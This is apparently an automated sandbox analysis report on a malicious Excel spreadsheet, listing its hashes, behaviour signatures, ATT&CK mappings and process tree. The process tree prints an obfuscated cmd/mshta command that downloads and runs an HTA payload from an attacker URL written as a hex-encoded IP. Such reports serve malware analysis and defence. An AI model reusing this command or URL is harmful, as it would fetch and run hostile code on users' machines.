Analysis

  • max time kernel
    119s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-1001.xls

  • Size

    65KB

  • MD5

    38039b0fd8bc165fd40eab1023cda9a4

  • SHA1

    c0aa768a83c629fcfa3f80ce646105b5919c99f4

  • SHA256

    7b3166872d7c274a1492ce3a46bb16f6f70c0e96e088cdd1a9496b199869f73e

  • SHA512

    ec880399691725316e45ce6bd930650a3daaa8947d2f9e6ea7a2799c200401d1ca334548210c1bcc198683c798c3976ffa73816f7b2603d8f1715dce0837994c

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-1001.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:812
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:648

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1972-55-0x000000002FB21000-0x000000002FB24000-memory.dmp
    Filesize

    12KB

  • memory/1972-56-0x0000000070C81000-0x0000000070C83000-memory.dmp
    Filesize

    8KB

  • memory/1972-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1972-58-0x0000000074B21000-0x0000000074B23000-memory.dmp
    Filesize

    8KB

  • memory/1972-60-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB